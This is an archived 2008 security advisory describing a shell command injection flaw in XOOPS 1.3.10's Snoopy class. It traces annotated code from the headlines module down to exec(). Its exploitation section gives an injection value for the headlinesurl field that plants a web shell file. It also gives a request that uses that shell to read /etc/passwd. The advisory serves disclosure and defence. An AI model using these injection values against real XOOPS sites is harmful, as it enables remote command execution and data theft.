Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: va1175.htm

xoops-1.3.10 shell command execute vulnerability ( causing snoopy class )



xoops-1.3.10 shell command execute vulnerability ( causing snoopy class )
xoops-1.3.10 shell command execute vulnerability ( causing snoopy class )



===0D
xoops-1.3.10 shell command execute vulnerability ( causing snoopy class )=0D
===0D
Author: geinblues ( geinblues [at] gmail [dot] com )=0D
DATE: 9.7.2008=0D
Site: http://enterblue.net/~x90c/=0D 
Risk: Midium=0D
===0D
=0D
=0D
=0D
[0] Vulnerability Tracing ( Tracing [BREAK 0] ~ [BREAK 6] )=0D
=0D
~/xoops-1.3.10/html/class/snoopy.class.php=0D
--------------------------------------------------------------------------------------------------------------------=0D
=0D
function _httpsrequest($url,$URI,$http_method,$content_type="",$body="")=0D
{=0D
		..	=0D
		/* [BREAK 5]: $URI(sourceURl in vulnerable Moudle) is Ours injected parameter From below fetch() */=0D
                $URI_PARTS = parse_url($URI);=0D
=0D
		..=0D
		/* [BREAK 6]: $URI (vulerable parameter) If we can reach to below, Then We can execute system shell command */=0D
                exec($this->curl_path." -D \"/tmp/$headerfile\"".$cmdline_params." ".$URI,$results,$return);=0D
=0D
		..=0D
}=0D
=0D
=0D
function fetch($URI)=0D
{=0D
=0D
                //preg_match("|^([^:]+)://([^:/]+)(:[\d]+)*(.*)|",$URI,$URI_PARTS);=0D
                $URI_PARTS = parse_url($URI);=0D
                if (!empty($URI_PARTS["user"]))=0D
                        $this->user = $URI_PARTS["user"];=0D
                if (!empty($URI_PARTS["pass"]))=0D
                        $this->pass = $URI_PARTS["pass"];=0D
=0D
                switch($URI_PARTS["scheme"])=0D
                {=0D
                        case "http":=0D
				..=0D
                        case "https":	/* [BREAK 3] sourceURl's first 5Bytes ( https in [BREAK 0] ) */=0D
                                if(!$this->curl_path || (!is_executable($this->curl_path)))=0D
                                        return false;=0D
                                $this->host = $URI_PARTS["host"];=0D
                                if(!empty($URI_PARTS["port"]))=0D
                                        $this->port = $URI_PARTS["port"];=0D
                                if($this->_isproxy)=0D
                                {=0D
                                        // using proxy, send entire URI	=0D
                                        $this->_httpsrequest($URI,$URI,$this->_httpmethod);=0D
                                }=0D
                                else=0D
                                {=0D
                                        $path = $URI_PARTS["path"].($URI_PARTS["query"] ? "?".$URI_PARTS["query"] : "");=0D
					=0D
					/* [BREAK 4] _httpsrequest(.., $URI, ..); Here Our Supplied $URI(sourceURl) */=0D
                                        // no proxy, send only the path	=0D
                                        $this->_httpsrequest($path, $URI, $this->_httpmethod);=0D
                                }=0D
=0D
                        default:=0D
				..=0D
                }=0D
                return true;=0D
        }=0D
=0D
=0D
--------------------------------------------------------------------------------------------------------------------=0D
~/xoops-1.3.10/class/phpsyndication.lib.php=0D
=0D
// | required: - PHP                                                          |=0D
// | - Snoopy (find it here: http://freshmeat.net/projects/snoopy) |=0D 
	/* [BREAK 1] We can supply parameter from RSS file into sourceUrl firstly */=0D
        class RSStoHTML=0D
        {=0D
                var $sourceUrl;         // location of the source RSS file	=0D
=0D
	..=0D
	}=0D
=0D
     /**=0D
         * includes Snoopy class for remote file access=0D
         */=0D
        require(XOOPS_ROOT_PATH."/class/snoopy.class.php");=0D
..=0D
                function getData($forcecache=false)=0D
                {=0D
                        if(_PHPSYNDICATION_CONNECTED && $forcecache != true && (!file_exists($this->cacheDir.$this->cacheFile) || (filemtime($this->cacheDir.$this->cacheFile) + $this->cacheTimeout - time()) < 0))=0D
                        {=0D
                                $snoopy = new Snoopy;=0D
		=0D
				/* [BREAK 2] Here snoopy->fetch(sourceUrl from [BREAK 1]) member function calling */=0D
                                $snoopy->fetch($this->sourceUrl);=0D
                                $data = $snoopy->results;=0D
=0D
                                $cacheFile = fopen($this->cacheDir.$this->cacheFile, "w");=0D
                                fwrite($cacheFile, $data);=0D
                                fclose($cacheFile);=0D
                        }=0D
                        // fsockopen failed the last time, so force cache=0D
                        elseif ( $forcecache == true )=0D
                        {=0D
                                if (file_exists($this->cacheDir.$this->cacheFile)) {=0D
                                        $data = implode('', file($this->cacheDir.$this->cacheFile));=0D
                                        // set the modified time to a future time, and let the server have time to come up again=0D
                                        touch($this->cacheDir.$this->cacheFile, time() + $this->cacheTimeout);=0D
                                } else {=0D
                                        $data = "";=0D
                                }=0D
                        } else {=0D
                                $data = implode('', file($this->cacheDir.$this->cacheFile));=0D
                        }=0D
                        return $data;=0D
                }=0D
=0D
     function getHtml($fromcache=false)=0D
                {=0D
                        $data = $this->getData($fromcache);=0D
=0D
..=0D
     function getTitle($fromcache=false)=0D
                {=0D
                        $data = $this->getData($fromcache=false);=0D
=0D
--------------------------------------------------------------------------------------------------------------------=0D
~/xoops-1.3.10/html/modules/headlines/blocks/headlines.php=0D
=0D
query("SELECT hid, sitename, url, headlinesurl, status FROM ".$xoopsDB->prefix("headlines")." WHERE status=1 OR status=2");=0D
        $xoopsDB->queryF("UPDATE ".$xoopsDB->prefix("headlines")." SET status=1 WHERE status=2");=0D
        while (list($hid, $sitename, $url, $headlinesurl, $status) = $xoopsDB->fetchRow($result)) {=0D
                $cache_file = "newsheadline-$hid.cache";=0D
                $block['content'] .= "

";=0D // fsockopen was ok the last time, so do it again=0D if ( $status == 2 ) {=0D $synd = new RSStoHTML($headlinesurl, $cache_dir, $cache_file, $cache_time, $max_items);=0D $block['content'] .= "".$synd->getTitle()."
";=0D $block['content'] .= $synd->getHtml();=0D }=0D // fsockopen did not return on the last attempt, so use cache=0D elseif ( $status == 1 ) {=0D // change cache time to 1 day(24hrs) might be safer=0D =0D /* [BREAK 0] RSStoHTML called when using this headlines module */=0D $synd = new RSStoHTML($headlinesurl, $cache_dir, $cache_file, 86400, $max_items); =0D =0D $block['content'] .= "".$synd->getTitle(true)."
";=0D $block['content'] .= $synd->getHtml(true);=0D }=0D $block['content'] .= "

";=0D // set status to 2(ok) for headlines that passed fsockopen or used cache=0D $xoopsDB->queryF("UPDATE ".$xoopsDB->prefix("headlines")." SET status=2 WHERE hid=$hid");=0D }=0D return $block;=0D }=0D ?>=0D =0D =0D [1] Exploitation:=0D =0D A. (*)INTO DB: =0D headlinesurl(headlines module table's field) = https://;`echo '' >> xox.php`=0D =0D B. Browsing xoops pages for referencing headlines module ( at this time. our parameter reached to snoopy class's exec(??,$URI,??) )=0D =0D C. =0D IN WEB-BROWSER: =0D http://victim/xoops-1.3.10/html/class/xox.php?cmd='cat /etc/passwd'=0D =0D TODO : http://www.xoops.org/modules/news/archive.php=0D We can search more vulnerable modules else headlinesurl (default module) from above url.=0D =0D =0D =0D =0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH